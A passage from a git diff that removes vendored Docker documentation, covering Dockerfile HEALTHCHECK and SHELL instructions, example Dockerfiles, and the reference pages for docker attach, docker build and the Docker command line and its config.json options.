consecutive failures, it becomes `unhealthy`. - -The options that can appear before `CMD` are: - -* `--interval=DURATION` (default: `30s`) -* `--timeout=DURATION` (default: `30s`) -* `--retries=N` (default: `3`) - -The health check will first run **interval** seconds after the container is -started, and then again **interval** seconds after each previous check completes. - -If a single run of the check takes longer than **timeout** seconds then the check -is considered to have failed. - -It takes **retries** consecutive failures of the health check for the container -to be considered `unhealthy`. - -There can only be one `HEALTHCHECK` instruction in a Dockerfile. If you list -more than one then only the last `HEALTHCHECK` will take effect. - -The command after the `CMD` keyword can be either a shell command (e.g. `HEALTHCHECK -CMD /bin/check-running`) or an _exec_ array (as with other Dockerfile commands; -see e.g. `ENTRYPOINT` for details). - -The command's exit status indicates the health status of the container. -The possible values are: - -- 0: success - the container is healthy and ready for use -- 1: unhealthy - the container is not working correctly -- 2: reserved - do not use this exit code - -For example, to check every five minutes or so that a web-server is able to -serve the site's main page within three seconds: - - HEALTHCHECK --interval=5m --timeout=3s \ - CMD curl -f http://localhost/ || exit 1 - -To help debug failing probes, any output text (UTF-8 encoded) that the command writes -on stdout or stderr will be stored in the health status and can be queried with -`docker inspect`. Such output should be kept short (only the first 4096 bytes -are stored currently). - -When the health status of a container changes, a `health_status` event is -generated with the new status. - -The `HEALTHCHECK` feature was added in Docker 1.12. - - -## SHELL - - SHELL ["executable", "parameters"] - -The `SHELL` instruction allows the default shell used for the *shell* form of -commands to be overridden. The default shell on Linux is `["/bin/sh", "-c"]`, and on -Windows is `["cmd", "/S", "/C"]`. The `SHELL` instruction *must* be written in JSON -form in a Dockerfile. - -The `SHELL` instruction is particularly useful on Windows where there are -two commonly used and quite different native shells: `cmd` and `powershell`, as -well as alternate shells available including `sh`. - -The `SHELL` instruction can appear multiple times. Each `SHELL` instruction overrides -all previous `SHELL` instructions, and affects all subsequent instructions. For example: - - FROM microsoft/windowsservercore - - # Executed as cmd /S /C echo default - RUN echo default - - # Executed as cmd /S /C powershell -command Write-Host default - RUN powershell -command Write-Host default - - # Executed as powershell -command Write-Host hello - SHELL ["powershell", "-command"] - RUN Write-Host hello - - # Executed as cmd /S /C echo hello - SHELL ["cmd", "/S"", "/C"] - RUN echo hello - -The following instructions can be affected by the `SHELL` instruction when the -*shell* form of them is used in a Dockerfile: `RUN`, `CMD` and `ENTRYPOINT`. - -The following example is a common pattern found on Windows which can be -streamlined by using the `SHELL` instruction: - - ... - RUN powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" - ... - -The command invoked by docker will be: - - cmd /S /C powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" - -This is inefficient for two reasons. First, there is an un-necessary cmd.exe command -processor (aka shell) being invoked. Second, each `RUN` instruction in the *shell* -form requires an extra `powershell -command` prefixing the command. - -To make this more efficient, one of two mechanisms can be employed. One is to -use the JSON form of the RUN command such as: - - ... - RUN ["powershell", "-command", "Execute-MyCmdlet", "-param1 \"c:\\foo.txt\""] - ... - -While the JSON form is unambiguous and does not use the un-necessary cmd.exe, -it does require more verbosity through double-quoting and escaping. The alternate -mechanism is to use the `SHELL` instruction and the *shell* form, -making a more natural syntax for Windows users, especially when combined with -the `escape` parser directive: - - # escape=` - - FROM microsoft/nanoserver - SHELL ["powershell","-command"] - RUN New-Item -ItemType Directory C:\Example - ADD Execute-MyCmdlet.ps1 c:\example\ - RUN c:\example\Execute-MyCmdlet -sample 'hello world' - -Resulting in: - - PS E:\docker\build\shell> docker build -t shell . - Sending build context to Docker daemon 4.096 kB - Step 1/5 : FROM microsoft/nanoserver - ---> 22738ff49c6d - Step 2/5 : SHELL powershell -command - ---> Running in 6fcdb6855ae2 - ---> 6331462d4300 - Removing intermediate container 6fcdb6855ae2 - Step 3/5 : RUN New-Item -ItemType Directory C:\Example - ---> Running in d0eef8386e97 - - - Directory: C:\ - - - Mode LastWriteTime Length Name - ---- ------------- ------ ---- - d----- 10/28/2016 11:26 AM Example - - - ---> 3f2fbf1395d9 - Removing intermediate container d0eef8386e97 - Step 4/5 : ADD Execute-MyCmdlet.ps1 c:\example\ - ---> a955b2621c31 - Removing intermediate container b825593d39fc - Step 5/5 : RUN c:\example\Execute-MyCmdlet 'hello world' - ---> Running in be6d8e63fe75 - hello world - ---> 8e559e9bf424 - Removing intermediate container be6d8e63fe75 - Successfully built 8e559e9bf424 - PS E:\docker\build\shell> - -The `SHELL` instruction could also be used to modify the way in which -a shell operates. For example, using `SHELL cmd /S /C /V:ON|OFF` on Windows, delayed -environment variable expansion semantics could be modified. - -The `SHELL` instruction can also be used on Linux should an alternate shell be -required such as `zsh`, `csh`, `tcsh` and others. - -The `SHELL` feature was added in Docker 1.12. - -## Dockerfile examples - -Below you can see some examples of Dockerfile syntax. If you're interested in -something more realistic, take a look at the list of [Dockerization examples](https://docs.docker.com/engine/examples/). - -``` -# Nginx -# -# VERSION 0.0.1 - -FROM ubuntu -LABEL Description="This image is used to start the foobar executable" Vendor="ACME Products" Version="1.0" -RUN apt-get update && apt-get install -y inotify-tools nginx apache2 openssh-server -``` - -``` -# Firefox over VNC -# -# VERSION 0.3 - -FROM ubuntu - -# Install vnc, xvfb in order to create a 'fake' display and firefox -RUN apt-get update && apt-get install -y x11vnc xvfb firefox -RUN mkdir ~/.vnc -# Setup a password -RUN x11vnc -storepasswd 1234 ~/.vnc/passwd -# Autostart firefox (might not be the best way, but it does the trick) -RUN bash -c 'echo "firefox" >> /.bashrc' - -EXPOSE 5900 -CMD ["x11vnc", "-forever", "-usepw", "-create"] -``` - -``` -# Multiple images example -# -# VERSION 0.1 - -FROM ubuntu -RUN echo foo > bar -# Will output something like ===> 907ad6c2736f - -FROM ubuntu -RUN echo moo > oink -# Will output something like ===> 695d7793cbe4 - -# You᾿ll now have two images, 907ad6c2736f with /bar, and 695d7793cbe4 with -# /oink. -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md deleted file mode 100644 index 307068a339..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md +++ /dev/null @@ -1,131 +0,0 @@ ---- -title: "attach" -description: "The attach command description and usage" -keywords: "attach, running, container" ---- - - - -# attach - -```markdown -Usage: docker attach [OPTIONS] CONTAINER - -Attach to a running container - -Options: - --detach-keys string Override the key sequence for detaching a container - --help Print usage - --no-stdin Do not attach STDIN - --sig-proxy Proxy all received signals to the process (default true) -``` - -Use `docker attach` to attach to a running container using the container's ID -or name, either to view its ongoing output or to control it interactively. -You can attach to the same contained process multiple times simultaneously, -screen sharing style, or quickly view the progress of your detached process. - -To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the -container. If `--sig-proxy` is true (the default),`CTRL-c` sends a `SIGINT` to -the container. You can detach from a container and leave it running using the - `CTRL-p CTRL-q` key sequence. - -> **Note:** -> A process running as PID 1 inside a container is treated specially by -> Linux: it ignores any signal with the default action. So, the process -> will not terminate on `SIGINT` or `SIGTERM` unless it is coded to do -> so. - -It is forbidden to redirect the standard input of a `docker attach` command -while attaching to a tty-enabled container (i.e.: launched with `-t`). - -While a client is connected to container's stdio using `docker attach`, Docker -uses a ~1MB memory buffer to maximize the throughput of the application. If -this buffer is filled, the speed of the API connection will start to have an -effect on the process output writing speed. This is similar to other -applications like SSH. Because of this, it is not recommended to run -performance critical applications that generate a lot of output in the -foreground over a slow client connection. Instead, users should use the -`docker logs` command to get access to the logs. - - -## Override the detach sequence - -If you want, you can configure an override the Docker key sequence for detach. -This is useful if the Docker default sequence conflicts with key sequence you -use for other applications. There are two ways to define your own detach key -sequence, as a per-container override or as a configuration property on your -entire configuration. - -To override the sequence for an individual container, use the -`--detach-keys=""` flag with the `docker attach` command. The format of -the `` is either a letter [a-Z], or the `ctrl-` combined with any of -the following: - -* `a-z` (a single lowercase alpha character ) -* `@` (at sign) -* `[` (left bracket) -* `\\` (two backward slashes) -* `_` (underscore) -* `^` (caret) - -These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key -sequences. To configure a different configuration default key sequence for all -containers, see [**Configuration file** section](cli.md#configuration-files). - -#### Examples - - $ docker run -d --name topdemo ubuntu /usr/bin/top -b - $ docker attach topdemo - top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355560k used, 18012k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221740k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top - - top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355244k used, 18328k free, 27872k buffers - Swap: 786428k total, 0k used, 786428k free, 221776k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top - - - top - 02:05:58 up 3:06, 0 users, load average: 0.01, 0.02, 0.05 - Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - Cpu(s): 0.2%us, 0.3%sy, 0.0%ni, 99.5%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st - Mem: 373572k total, 355780k used, 17792k free, 27880k buffers - Swap: 786428k total, 0k used, 786428k free, 221776k cached - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top - ^C$ - $ echo $? - 0 - $ docker ps -a | grep topdemo - 7998ac8581f9 ubuntu:14.04 "/usr/bin/top -b" 38 seconds ago Exited (0) 21 seconds ago topdemo - -And in this second example, you can see the exit code returned by the `bash` -process is returned by the `docker attach` command to its caller too: - - $ docker run --name test -d -it debian - 275c44472aebd77c926d4527885bb09f2f6db21d878c75f0a1c212c03d3bcfab - $ docker attach test - root@f38c87f2a42d:/# exit 13 - exit - $ echo $? - 13 - $ docker ps -a | grep test - 275c44472aeb debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/build.md b/vendor/github.com/docker/docker/docs/reference/commandline/build.md deleted file mode 100644 index 42c3ecf65f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/build.md +++ /dev/null @@ -1,451 +0,0 @@ ---- -title: "build" -description: "The build command description and usage" -keywords: "build, docker, image" ---- - - - -# build - -```markdown -Usage: docker build [OPTIONS] PATH | URL | - - -Build an image from a Dockerfile - -Options: - --build-arg value Set build-time variables (default []) - --cache-from value Images to consider as cache sources (default []) - --cgroup-parent string Optional parent cgroup for the container - --compress Compress the build context using gzip - --cpu-period int Limit the CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit the CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - --disable-content-trust Skip image verification (default true) - -f, --file string Name of the Dockerfile (Default is 'PATH/Dockerfile') - --force-rm Always remove intermediate containers - --help Print usage - --isolation string Container isolation technology - --label value Set metadata for an image (default []) - -m, --memory string Memory limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --network string Set the networking mode for the RUN instructions during build - 'bridge': use default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --no-cache Do not use cache when building the image - --pull Always attempt to pull a newer version of the image - -q, --quiet Suppress the build output and print image ID on success - --rm Remove intermediate containers after a successful build (default true) - --security-opt value Security Options (default []) - --shm-size string Size of /dev/shm, default value is 64MB. - The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), - or `g` (gigabytes). If you omit the unit, the system uses bytes. - --squash Squash newly built layers into a single new layer (**Experimental Only**) - -t, --tag value Name and optionally a tag in the 'name:tag' format (default []) - --ulimit value Ulimit options (default []) -``` - -Builds Docker images from a Dockerfile and a "context". A build's context is -the files located in the specified `PATH` or `URL`. The build process can refer -to any of the files in the context. For example, your build can use an -[*ADD*](../builder.md#add) instruction to reference a file in the -context. - -The `URL` parameter can refer to three kinds of resources: Git repositories, -pre-packaged tarball contexts and plain text files. - -### Git repositories - -When the `URL` parameter points to the location of a Git repository, the -repository acts as the build context. The system recursively clones the -repository and its submodules using a `git clone --depth 1 --recursive` -command. This command runs in a temporary directory on your local host. After -the command succeeds, the directory is sent to the Docker daemon as the -context. Local clones give you the ability to access private repositories using -local user credentials, VPN's, and so forth. - -Git URLs accept context configuration in their fragment section, separated by a -colon `:`. The first part represents the reference that Git will check out, -this can be either a branch, a tag, or a commit SHA. The second part represents -a subdirectory inside the repository that will be used as a build context. - -For example, run this command to use a directory called `docker` in the branch -`container`: - -```bash -$ docker build https://github.com/docker/rootfs.git#container:docker -``` - -The following table represents all the valid suffixes with their build -contexts: - -Build Syntax Suffix | Commit Used | Build Context Used ---------------------------------|-----------------------|------------------- -`myrepo.git` | `refs/heads/master` | `/` -`myrepo.git#mytag` | `refs/tags/mytag` | `/` -`myrepo.git#mybranch` | `refs/heads/mybranch` | `/` -`myrepo.git#abcdef` | `sha1 = abcdef` | `/` -`myrepo.git#:myfolder` | `refs/heads/master` | `/myfolder` -`myrepo.git#master:myfolder` | `refs/heads/master` | `/myfolder` -`myrepo.git#mytag:myfolder` | `refs/tags/mytag` | `/myfolder` -`myrepo.git#mybranch:myfolder` | `refs/heads/mybranch` | `/myfolder` -`myrepo.git#abcdef:myfolder` | `sha1 = abcdef` | `/myfolder` - - -### Tarball contexts - -If you pass an URL to a remote tarball, the URL itself is sent to the daemon: - -Instead of specifying a context, you can pass a single Dockerfile in the `URL` -or pipe the file in via `STDIN`. To pipe a Dockerfile from `STDIN`: - -```bash -$ docker build http://server/context.tar.gz -``` - -The download operation will be performed on the host the Docker daemon is -running on, which is not necessarily the same host from which the build command -is being issued. The Docker daemon will fetch `context.tar.gz` and use it as the -build context. Tarball contexts must be tar archives conforming to the standard -`tar` UNIX format and can be compressed with any one of the 'xz', 'bzip2', -'gzip' or 'identity' (no compression) formats. - -### Text files - -Instead of specifying a context, you can pass a single `Dockerfile` in the -`URL` or pipe the file in via `STDIN`. To pipe a `Dockerfile` from `STDIN`: - -```bash -$ docker build - < Dockerfile -``` - -With Powershell on Windows, you can run: - -```powershell -Get-Content Dockerfile | docker build - -``` - -If you use `STDIN` or specify a `URL` pointing to a plain text file, the system -places the contents into a file called `Dockerfile`, and any `-f`, `--file` -option is ignored. In this scenario, there is no context. - -By default the `docker build` command will look for a `Dockerfile` at the root -of the build context. The `-f`, `--file`, option lets you specify the path to -an alternative file to use instead. This is useful in cases where the same set -of files are used for multiple builds. The path must be to a file within the -build context. If a relative path is specified then it is interpreted as -relative to the root of the context. - -In most cases, it's best to put each Dockerfile in an empty directory. Then, -add to that directory only the files needed for building the Dockerfile. To -increase the build's performance, you can exclude files and directories by -adding a `.dockerignore` file to that directory as well. For information on -creating one, see the [.dockerignore file](../builder.md#dockerignore-file). - -If the Docker client loses connection to the daemon, the build is canceled. -This happens if you interrupt the Docker client with `CTRL-c` or if the Docker -client is killed for any reason. If the build initiated a pull which is still -running at the time the build is cancelled, the pull is cancelled as well. - -## Return code - -On a successful build, a return code of success `0` will be returned. When the -build fails, a non-zero failure code will be returned. - -There should be informational output of the reason for failure output to -`STDERR`: - -```bash -$ docker build -t fail . - -Sending build context to Docker daemon 2.048 kB -Sending build context to Docker daemon -Step 1/3 : FROM busybox - ---> 4986bf8c1536 -Step 2/3 : RUN exit 13 - ---> Running in e26670ec7a0a -INFO[0000] The command [/bin/sh -c exit 13] returned a non-zero code: 13 -$ echo $? -1 -``` - -See also: - -[*Dockerfile Reference*](../builder.md). - -## Examples - -### Build with PATH - -```bash -$ docker build . - -Uploading context 10240 bytes -Step 1/3 : FROM busybox -Pulling repository busybox - ---> e9aa60c60128MB/2.284 MB (100%) endpoint: https://cdn-registry-1.docker.io/v1/ -Step 2/3 : RUN ls -lh / - ---> Running in 9c9e81692ae9 -total 24 -drwxr-xr-x 2 root root 4.0K Mar 12 2013 bin -drwxr-xr-x 5 root root 4.0K Oct 19 00:19 dev -drwxr-xr-x 2 root root 4.0K Oct 19 00:19 etc -drwxr-xr-x 2 root root 4.0K Nov 15 23:34 lib -lrwxrwxrwx 1 root root 3 Mar 12 2013 lib64 -> lib -dr-xr-xr-x 116 root root 0 Nov 15 23:34 proc -lrwxrwxrwx 1 root root 3 Mar 12 2013 sbin -> bin -dr-xr-xr-x 13 root root 0 Nov 15 23:34 sys -drwxr-xr-x 2 root root 4.0K Mar 12 2013 tmp -drwxr-xr-x 2 root root 4.0K Nov 15 23:34 usr - ---> b35f4035db3f -Step 3/3 : CMD echo Hello world - ---> Running in 02071fceb21b - ---> f52f38b7823e -Successfully built f52f38b7823e -Removing intermediate container 9c9e81692ae9 -Removing intermediate container 02071fceb21b -``` - -This example specifies that the `PATH` is `.`, and so all the files in the -local directory get `tar`d and sent to the Docker daemon. The `PATH` specifies -where to find the files for the "context" of the build on the Docker daemon. -Remember that the daemon could be running on a remote machine and that no -parsing of the Dockerfile happens at the client side (where you're running -`docker build`). That means that *all* the files at `PATH` get sent, not just -the ones listed to [*ADD*](../builder.md#add) in the Dockerfile. - -The transfer of context from the local machine to the Docker daemon is what the -`docker` client means when you see the "Sending build context" message. - -If you wish to keep the intermediate containers after the build is complete, -you must use `--rm=false`. This does not affect the build cache. - -### Build with URL - -```bash -$ docker build github.com/creack/docker-firefox -``` - -This will clone the GitHub repository and use the cloned repository as context. -The Dockerfile at the root of the repository is used as Dockerfile. You can -specify an arbitrary Git repository by using the `git://` or `git@` scheme. - -```bash -$ docker build -f ctx/Dockerfile http://server/ctx.tar.gz - -Downloading context: http://server/ctx.tar.gz [===================>] 240 B/240 B -Step 1/3 : FROM busybox - ---> 8c2e06607696 -Step 2/3 : ADD ctx/container.cfg / - ---> e7829950cee3 -Removing intermediate container b35224abf821 -Step 3/3 : CMD /bin/ls - ---> Running in fbc63d321d73 - ---> 3286931702ad -Removing intermediate container fbc63d321d73 -Successfully built 377c409b35e4 -``` - -This sends the URL `http://server/ctx.tar.gz` to the Docker daemon, which -downloads and extracts the referenced tarball. The `-f ctx/Dockerfile` -parameter specifies a path inside `ctx.tar.gz` to the `Dockerfile` that is used -to build the image. Any `ADD` commands in that `Dockerfile` that refer to local -paths must be relative to the root of the contents inside `ctx.tar.gz`. In the -example above, the tarball contains a directory `ctx/`, so the `ADD -ctx/container.cfg /` operation works as expected. - -### Build with - - -```bash -$ docker build - < Dockerfile -``` - -This will read a Dockerfile from `STDIN` without context. Due to the lack of a -context, no contents of any local directory will be sent to the Docker daemon. -Since there is no context, a Dockerfile `ADD` only works if it refers to a -remote URL. - -```bash -$ docker build - < context.tar.gz -``` - -This will build an image for a compressed context read from `STDIN`. Supported -formats are: bzip2, gzip and xz. - -### Usage of .dockerignore - -```bash -$ docker build . - -Uploading context 18.829 MB -Uploading context -Step 1/2 : FROM busybox - ---> 769b9341d937 -Step 2/2 : CMD echo Hello world - ---> Using cache - ---> 99cc1ad10469 -Successfully built 99cc1ad10469 -$ echo ".git" > .dockerignore -$ docker build . -Uploading context 6.76 MB -Uploading context -Step 1/2 : FROM busybox - ---> 769b9341d937 -Step 2/2 : CMD echo Hello world - ---> Using cache - ---> 99cc1ad10469 -Successfully built 99cc1ad10469 -``` - -This example shows the use of the `.dockerignore` file to exclude the `.git` -directory from the context. Its effect can be seen in the changed size of the -uploaded context. The builder reference contains detailed information on -[creating a .dockerignore file](../builder.md#dockerignore-file) - -### Tag image (-t) - -```bash -$ docker build -t vieux/apache:2.0 . -``` - -This will build like the previous example, but it will then tag the resulting -image. The repository name will be `vieux/apache` and the tag will be `2.0`. -[Read more about valid tags](tag.md). - -You can apply multiple tags to an image. For example, you can apply the `latest` -tag to a newly built image and add another tag that references a specific -version. -For example, to tag an image both as `whenry/fedora-jboss:latest` and -`whenry/fedora-jboss:v2.1`, use the following: - -```bash -$ docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . -``` -### Specify Dockerfile (-f) - -```bash -$ docker build -f Dockerfile.debug . -``` - -This will use a file called `Dockerfile.debug` for the build instructions -instead of `Dockerfile`. - -```bash -$ docker build -f dockerfiles/Dockerfile.debug -t myapp_debug . -$ docker build -f dockerfiles/Dockerfile.prod -t myapp_prod . -``` - -The above commands will build the current build context (as specified by the -`.`) twice, once using a debug version of a `Dockerfile` and once using a -production version. - -```bash -$ cd /home/me/myapp/some/dir/really/deep -$ docker build -f /home/me/myapp/dockerfiles/debug /home/me/myapp -$ docker build -f ../../../../dockerfiles/debug /home/me/myapp -``` - -These two `docker build` commands do the exact same thing. They both use the -contents of the `debug` file instead of looking for a `Dockerfile` and will use -`/home/me/myapp` as the root of the build context. Note that `debug` is in the -directory structure of the build context, regardless of how you refer to it on -the command line. - -> **Note:** -> `docker build` will return a `no such file or directory` error if the -> file or directory does not exist in the uploaded context. This may -> happen if there is no context, or if you specify a file that is -> elsewhere on the Host system. The context is limited to the current -> directory (and its children) for security reasons, and to ensure -> repeatable builds on remote Docker hosts. This is also the reason why -> `ADD ../file` will not work. - -### Optional parent cgroup (--cgroup-parent) - -When `docker build` is run with the `--cgroup-parent` option the containers -used in the build will be run with the [corresponding `docker run` -flag](../run.md#specifying-custom-cgroups). - -### Set ulimits in container (--ulimit) - -Using the `--ulimit` option with `docker build` will cause each build step's -container to be started using those [`--ulimit` -flag values](./run.md#set-ulimits-in-container-ulimit). - -### Set build-time variables (--build-arg) - -You can use `ENV` instructions in a Dockerfile to define variable -values. These values persist in the built image. However, often -persistence is not what you want. Users want to specify variables differently -depending on which host they build an image on. - -A good example is `http_proxy` or source versions for pulling intermediate -files. The `ARG` instruction lets Dockerfile authors define values that users -can set at build-time using the `--build-arg` flag: - -```bash -$ docker build --build-arg HTTP_PROXY=http://10.20.30.2:1234 . -``` - -This flag allows you to pass the build-time variables that are -accessed like regular environment variables in the `RUN` instruction of the -Dockerfile. Also, these values don't persist in the intermediate or final images -like `ENV` values do. - -Using this flag will not alter the output you see when the `ARG` lines from the -Dockerfile are echoed during the build process. - -For detailed information on using `ARG` and `ENV` instructions, see the -[Dockerfile reference](../builder.md). - -### Optional security options (--security-opt) - -This flag is only supported on a daemon running on Windows, and only supports -the `credentialspec` option. The `credentialspec` must be in the format -`file://spec.txt` or `registry://keyname`. - -### Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - - -| Value | Description | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | -| `process` | Namespace isolation only. | -| `hyperv` | Hyper-V hypervisor partition-based isolation. | - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. - - -### Squash an image's layers (--squash) **Experimental Only** - -Once the image is built, squash the new layers into a new image with a single -new layer. Squashing does not destroy any existing image, rather it creates a new -image with the content of the squshed layers. This effectively makes it look -like all `Dockerfile` commands were created with a single layer. The build -cache is preserved with this method. - -**Note**: using this option means the new image will not be able to take -advantage of layer sharing with other images and may use significantly more -space. - -**Note**: using this option you may see significantly more space used due to -storing two copies of the image, one for the build cache with all the cache -layers in tact, and one for the squashed version. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md deleted file mode 100644 index e56fb9f847..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md +++ /dev/null @@ -1,249 +0,0 @@ ---- -title: "Use the Docker command line" -description: "Docker's CLI command description and usage" -keywords: "Docker, Docker documentation, CLI, command line" ---- - - - -# Use the Docker command line - -To list available commands, either run `docker` with no parameters -or execute `docker help`: - -```bash -$ docker -Usage: docker [OPTIONS] COMMAND [ARG...] - docker [ --help | -v | --version ] - -A self-sufficient runtime for containers. - -Options: - --config string Location of client config files (default "/root/.docker") - -D, --debug Enable debug mode - --help Print usage - -H, --host value Daemon socket(s) to connect to (default []) - -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") - --tls Use TLS; implied by --tlsverify - --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") - --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") - --tlskey string Path to TLS key file (default "/root/.docker/key.pem") - --tlsverify Use TLS and verify the remote - -v, --version Print version information and quit - -Commands: - attach Attach to a running container - # […] -``` - -Depending on your Docker system configuration, you may be required to preface -each `docker` command with `sudo`. To avoid having to use `sudo` with the -`docker` command, your system administrator can create a Unix group called -`docker` and add users to it. - -For more information about installing Docker or `sudo` configuration, refer to -the [installation](https://docs.docker.com/engine/installation/) instructions for your operating system. - -## Environment variables - -For easy reference, the following list of environment variables are supported -by the `docker` command line: - -* `DOCKER_API_VERSION` The API version to use (e.g. `1.19`) -* `DOCKER_CONFIG` The location of your client configuration files. -* `DOCKER_CERT_PATH` The location of your authentication keys. -* `DOCKER_DRIVER` The graph driver to use. -* `DOCKER_HOST` Daemon socket to connect to. -* `DOCKER_NOWARN_KERNEL_VERSION` Prevent warnings that your Linux kernel is - unsuitable for Docker. -* `DOCKER_RAMDISK` If set this will disable 'pivot_root'. -* `DOCKER_TLS_VERIFY` When set Docker uses TLS and verifies the remote. -* `DOCKER_CONTENT_TRUST` When set Docker uses notary to sign and verify images. - Equates to `--disable-content-trust=false` for build, create, pull, push, run. -* `DOCKER_CONTENT_TRUST_SERVER` The URL of the Notary server to use. This defaults - to the same URL as the registry. -* `DOCKER_HIDE_LEGACY_COMMANDS` When set, Docker hides "legacy" top-level commands (such as `docker rm`, and - `docker pull`) in `docker help` output, and only `Management commands` per object-type (e.g., `docker container`) are - printed. This may become the default in a future release, at which point this environment-variable is removed. -* `DOCKER_TMPDIR` Location for temporary Docker files. - -Because Docker is developed using Go, you can also use any environment -variables used by the Go runtime. In particular, you may find these useful: - -* `HTTP_PROXY` -* `HTTPS_PROXY` -* `NO_PROXY` - -These Go environment variables are case-insensitive. See the -[Go specification](http://golang.org/pkg/net/http/) for details on these -variables. - -## Configuration files - -By default, the Docker command line stores its configuration files in a -directory called `.docker` within your `$HOME` directory. However, you can -specify a different location via the `DOCKER_CONFIG` environment variable -or the `--config` command line option. If both are specified, then the -`--config` option overrides the `DOCKER_CONFIG` environment variable. -For example: - - docker --config ~/testconfigs/ ps - -Instructs Docker to use the configuration files in your `~/testconfigs/` -directory when running the `ps` command. - -Docker manages most of the files in the configuration directory -and you should not modify them. However, you *can modify* the -`config.json` file to control certain aspects of how the `docker` -command behaves. - -Currently, you can modify the `docker` command behavior using environment -variables or command-line options. You can also use options within -`config.json` to modify some of the same behavior. When using these -mechanisms, you must keep in mind the order of precedence among them. Command -line options override environment variables and environment variables override -properties you specify in a `config.json` file. - -The `config.json` file stores a JSON encoding of several properties: - -The property `HttpHeaders` specifies a set of headers to include in all messages -sent from the Docker client to the daemon. Docker does not try to interpret or -understand these header; it simply puts them into the messages. Docker does -not allow these headers to change any headers it sets for itself. - -The property `psFormat` specifies the default format for `docker ps` output. -When the `--format` flag is not provided with the `docker ps` command, -Docker's client uses this property. If this property is not set, the client -falls back to the default table format. For a list of supported formatting -directives, see the -[**Formatting** section in the `docker ps` documentation](ps.md) - -The property `imagesFormat` specifies the default format for `docker images` output. -When the `--format` flag is not provided with the `docker images` command, -Docker's client uses this property. If this property is not set, the client -falls back to the default table format. For a list of supported formatting -directives, see the [**Formatting** section in the `docker images` documentation](images.md) - -The property `serviceInspectFormat` specifies the default format for `docker -service inspect` output. When the `--format` flag is not provided with the -`docker service inspect` command, Docker's client uses this property. If this -property is not set, the client falls back to the default json format. For a -list of supported formatting directives, see the -[**Formatting** section in the `docker service inspect` documentation](service_inspect.md) - -The property `statsFormat` specifies the default format for `docker -stats` output. When the `--format` flag is not provided with the -`docker stats` command, Docker's client uses this property. If this -property is not set, the client falls back to the default table -format. For a list of supported formatting directives, see -[**Formatting** section in the `docker stats` documentation](stats.md) - -Once attached to a container, users detach from it and leave it running using -the using `CTRL-p CTRL-q` key sequence. This detach key sequence is customizable -using the `detachKeys` property. Specify a `` value for the -property. The format of the `` is a comma-separated list of either -a letter [a-Z], or the `ctrl-` combined with any of the following: - -* `a-z` (a single lowercase alpha character ) -* `@` (at sign) -* `[` (left bracket) -* `\\` (two backward slashes) -* `_` (underscore) -* `^` (caret) - -Your customization applies to all containers started in with your Docker client. -Users can override your custom or the default key sequence on a per-container -basis. To do this, the user specifies the `--detach-keys` flag with the `docker -attach`, `docker exec`, `docker run` or `docker start` command. - -Following is a sample `config.json` file: - - {% raw %} - { - "HttpHeaders": { - "MyHeader": "MyValue" - }, - "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", - "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", - "statsFormat": "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}", - "serviceInspectFormat": "pretty", - "detachKeys": "ctrl-e,e" - } - {% endraw %} - -### Notary - -If using your own notary server and a self-signed certificate or an internal -Certificate Authority, you need to place the certificate at 